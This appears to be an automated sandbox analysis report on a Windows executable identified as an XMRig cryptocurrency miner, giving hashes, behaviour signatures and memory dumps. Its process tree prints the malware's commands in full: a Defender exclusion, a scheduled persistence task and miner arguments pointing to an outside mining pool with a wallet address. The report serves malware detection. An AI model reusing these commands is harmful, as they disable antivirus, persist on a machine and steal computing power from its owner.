Overview

overview

10

Static

static

file.exe

windows7-x64

10

file.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    91s
  • max time network
    153s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20221111-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20221111-enlocale:en-usos:windows10-2004-x64system
  • submitted
    07/01/2023, 18:34

Sharing

Copy URL Twitter E-mail
Report Analysis Logs

General

  • Target

    file.exe

  • Size

    841KB

  • MD5

    1fde5cfbf43638f1e806f9f5f90659f9

  • SHA1

    cf0e1dd0a9dca901d74a5ce7c98a69f93b950875

  • SHA256

    5950196adf1ba037d91fb9b9687e9f3e471b905c36975ee238266fd0236f837f

  • SHA512

    ca0a6c0e2a82d3676fb4c06dc8b01f345ab5df8f3c0122bde157ae81b53da1d298ea2225c3244eff0c96b5da2c1d0f5140c84c514b194e208ba7f7bf943ff8c2

  • SSDEEP

    24576:Vxo0vng/ho1bzqy33wOrsytVFguINYeiUdd:LNvng/hLj7MrINYeb

Score
10/10
xmrigminer

Malware Config

Signatures

  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

    minerxmrig
  • XMRig Miner payload 6 IoCs
    miner
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Uses the VBS compiler for execution 1 TTPs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistence
  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious behavior: LoadsDriver 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of WriteProcessMemory 20 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\file.exe
    "C:\Users\Admin\AppData\Local\Temp\file.exe"
    1⤵
    • Checks computer location settings
    • Suspicious use of SetThreadContext
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:1352
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell" -Command Add-MpPreference -ExclusionPath 'C:\ProgramData'
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:4580
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "VANOZ" /tr "C:\ProgramData\Explorer\VANOZ.exe"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:4332
      • C:\Windows\system32\schtasks.exe
        schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "VANOZ" /tr "C:\ProgramData\Explorer\VANOZ.exe"
        3⤵
        • Creates scheduled task(s)
        PID:60
    • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe -o xmr-eu1.nanopool.org:14433 -u 4BrL51JCc9NGQ71kWhnYoDRffsDZy7m1HUU7MRU4nUMXAHNFBEJhkTZV9HdaL4gfuNBxLPc3BeMkLGaPbF5vWtANQoBJqYKAGMEQrLE8L8 --tls --coin monero
      2⤵
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of FindShellTrayWindow
      PID:3116

Network

        MITRE ATT&CK Enterprise v6

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • memory/1352-142-0x00000000000E0000-0x000000000021C000-memory.dmp

          Filesize

          1.2MB

          Download

        • memory/1352-135-0x00007FFCC1D50000-0x00007FFCC1D62000-memory.dmp

          Filesize

          72KB

          Download

        • memory/1352-136-0x00007FFCA9060000-0x00007FFCA911D000-memory.dmp

          Filesize

          756KB

          Download

        • memory/1352-137-0x00007FFCC4920000-0x00007FFCC4AC1000-memory.dmp

          Filesize

          1.6MB

          Download

        • memory/1352-138-0x00007FFCA79B0000-0x00007FFCA8471000-memory.dmp

          Filesize

          10.8MB

          Download

        • memory/1352-139-0x00007FFCC4AD0000-0x00007FFCC4AFB000-memory.dmp

          Filesize

          172KB

          Download

        • memory/1352-140-0x00000000000E0000-0x000000000021C000-memory.dmp

          Filesize

          1.2MB

          Download

        • memory/1352-141-0x00007FFCA8810000-0x00007FFCA895E000-memory.dmp

          Filesize

          1.3MB

          Download

        • memory/1352-154-0x00007FFCA4C30000-0x00007FFCA4D32000-memory.dmp

          Filesize

          1.0MB

          Download

        • memory/1352-143-0x0000000003670000-0x00000000036B3000-memory.dmp

          Filesize

          268KB

          Download

        • memory/1352-164-0x00007FFCA79B0000-0x00007FFCA8471000-memory.dmp

          Filesize

          10.8MB

          Download

        • memory/1352-145-0x00007FFCC3E30000-0x00007FFCC3E57000-memory.dmp

          Filesize

          156KB

          Download

        • memory/1352-144-0x00007FFCA79B0000-0x00007FFCA8471000-memory.dmp

          Filesize

          10.8MB

          Download

        • memory/1352-163-0x00000000000E0000-0x000000000021C000-memory.dmp

          Filesize

          1.2MB

          Download

        • memory/1352-133-0x00007FFCA9120000-0x00007FFCA91CA000-memory.dmp

          Filesize

          680KB

          Download

        • memory/1352-156-0x00007FFCC3200000-0x00007FFCC323B000-memory.dmp

          Filesize

          236KB

          Download

        • memory/1352-150-0x00007FFCA79B0000-0x00007FFCA8471000-memory.dmp

          Filesize

          10.8MB

          Download

        • memory/1352-155-0x00007FFCC61C0000-0x00007FFCC622B000-memory.dmp

          Filesize

          428KB

          Download

        • memory/1352-134-0x00007FFCC5C20000-0x00007FFCC5CBE000-memory.dmp

          Filesize

          632KB

          Download

        • memory/1352-153-0x00007FFCA87A0000-0x00007FFCA87D5000-memory.dmp

          Filesize

          212KB

          Download

        • memory/3116-160-0x0000000140000000-0x00000001407C9000-memory.dmp

          Filesize

          7.8MB

          Download

        • memory/3116-167-0x0000022617E60000-0x0000022617E80000-memory.dmp

          Filesize

          128KB

          Download

        • memory/3116-170-0x0000022617ED0000-0x0000022617EF0000-memory.dmp

          Filesize

          128KB

          Download

        • memory/3116-157-0x0000000140000000-0x00000001407C9000-memory.dmp

          Filesize

          7.8MB

          Download

        • memory/3116-159-0x0000000140000000-0x00000001407C9000-memory.dmp

          Filesize

          7.8MB

          Download

        • memory/3116-169-0x0000022617E60000-0x0000022617E80000-memory.dmp

          Filesize

          128KB

          Download

        • memory/3116-161-0x00000226163A0000-0x00000226163C0000-memory.dmp

          Filesize

          128KB

          Download

        • memory/3116-162-0x0000000140000000-0x00000001407C9000-memory.dmp

          Filesize

          7.8MB

          Download

        • memory/3116-168-0x0000022617ED0000-0x0000022617EF0000-memory.dmp

          Filesize

          128KB

          Download

        • memory/3116-166-0x0000022617E90000-0x0000022617ED0000-memory.dmp

          Filesize

          256KB

          Download

        • memory/3116-165-0x0000000140000000-0x00000001407C9000-memory.dmp

          Filesize

          7.8MB

          Download

        • memory/4580-147-0x0000025138DD0000-0x0000025138DF2000-memory.dmp

          Filesize

          136KB

          Download

        • memory/4580-148-0x00007FFCA79B0000-0x00007FFCA8471000-memory.dmp

          Filesize

          10.8MB

          Download

        • memory/4580-149-0x00007FFCA79B0000-0x00007FFCA8471000-memory.dmp

          Filesize

          10.8MB

          Download